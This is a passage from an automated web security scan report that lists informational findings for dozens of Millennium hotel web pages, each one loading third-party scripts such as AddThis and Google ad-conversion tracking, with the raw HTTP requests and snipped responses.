Last-Modified: Wed, 02 Feb 2011 11:11:27 GMT
ETag: "2257f-cdc3-b5daaecc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.654. http://www.millenniumhotels.co.uk/copthornebirmingham/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornebirmingham/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornebirmingham/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:02:25 GMT
ETag: "1fb35-cd2c-42b55e8b"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.655. http://www.millenniumhotels.co.uk/copthornecardiff/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornecardiff/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornecardiff/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:10:41 GMT
ETag: "138a7-cde2-b31970ce"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.656. http://www.millenniumhotels.co.uk/copthornedudley/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornedudley/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornedudley/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:01:28 GMT
ETag: "220c6-cc5e-3f505566"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.657. http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthorneeffinghamgatwick/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthorneeffinghamgatwick/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:01:03 GMT
ETag: "1256a-ce83-3dd2260b"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.658. http://www.millenniumhotels.co.uk/copthornegatwick/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornegatwick/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornegatwick/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:00:43 GMT
ETag: "1bfd3-cf9c-3c9a4c0f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.659. http://www.millenniumhotels.co.uk/copthornemanchester/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornemanchester/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornemanchester/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:09:12 GMT
ETag: "1337d-ce10-adcefc15"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.660. http://www.millenniumhotels.co.uk/copthornenewcastle/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornenewcastle/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornenewcastle/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:08:49 GMT
ETag: "1fb0c-cd95-ac70455e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.661. http://www.millenniumhotels.co.uk/copthorneplymouth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthorneplymouth/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthorneplymouth/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:59:20 GMT
ETag: "27eec-ce43-37aebb54"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.662. http://www.millenniumhotels.co.uk/copthornereading/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornereading/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornereading/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:08:00 GMT
ETag: "13c71-caab-a97d3307"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.663. http://www.millenniumhotels.co.uk/copthornesheffield/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornesheffield/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornesheffield/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:07:42 GMT
ETag: "15055-cc8e-a8713783"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.664. http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornesloughwindsor/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornesloughwindsor/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:07:26 GMT
ETag: "280f4-cf26-a775af6c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

18.665. http://www.millenniumhotels.co.uk/copthornetarakensington/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornetarakensington/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /copthornetarakensington/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:57:52 GMT
ETag: "13d58-f912-326483a4"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63762

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.666. http://www.millenniumhotels.co.uk/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
https://www.googleadservices.com/pagead/conversion.js

Request

GET /index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:02:12 GMT
ETag: "1aa1b-24d23-94bad965"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 150819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.667. http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumcopthornechelseafc/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
https://www.googleadservices.com/pagead/conversion.js

Request

GET /millenniumcopthornechelseafc/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:00:53 GMT
ETag: "12288-d17d-9009753e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53629

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.668. http://www.millenniumhotels.co.uk/millenniumglasgow/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumglasgow/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumglasgow/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:52:04 GMT
ETag: "12ae9-ce65-1db0f230"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.669. http://www.millenniumhotels.co.uk/millenniumgloucester/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumgloucester/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
https://www.googleadservices.com/pagead/conversion.js

Request

GET /millenniumgloucester/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:51:41 GMT
ETag: "1bab1-d5c9-1c47bded"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54729

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.670. http://www.millenniumhotels.co.uk/millenniumkensington/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumkensington/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
https://www.googleadservices.com/pagead/conversion.js

Request

GET /millenniumkensington/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:59:29 GMT
ETag: "1bf04-d496-8b11f8c1"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54422

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.671. http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumknightsbridge/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
https://www.googleadservices.com/pagead/conversion.js

Request

GET /millenniumknightsbridge/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:58:05 GMT
ETag: "28935-d403-860398e4"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54275

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.672. http://www.millenniumhotels.co.uk/millenniummayfair/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniummayfair/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
https://www.googleadservices.com/pagead/conversion.js

Request

GET /millenniummayfair/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:50:26 GMT
ETag: "28aca-d76e-17d04951"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55150

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.673. http://www.millenniumhotels.co.uk/millenniumreading/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumreading/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumreading/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:56:37 GMT
ETag: "28cc9-cf1e-80cd6828"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mciluk"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.674. http://www.millenniumhotels.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET / HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:13:19 GMT
ETag: "3306a-2457f-e5f3531c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 148863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.675. http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/copthornehoteldubai/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme

Request

GET /ae/copthornehoteldubai/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:49:15 GMT
ETag: "14693-d881-1395ddb5"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

18.676. http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/grandmillenniumalwahda/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme

Request

GET /ae/grandmillenniumalwahda/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:48:45 GMT
ETag: "222fd-c8a0-11d711d3"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:14 GMT
Connection: close
Connection: Transfer-Encoding
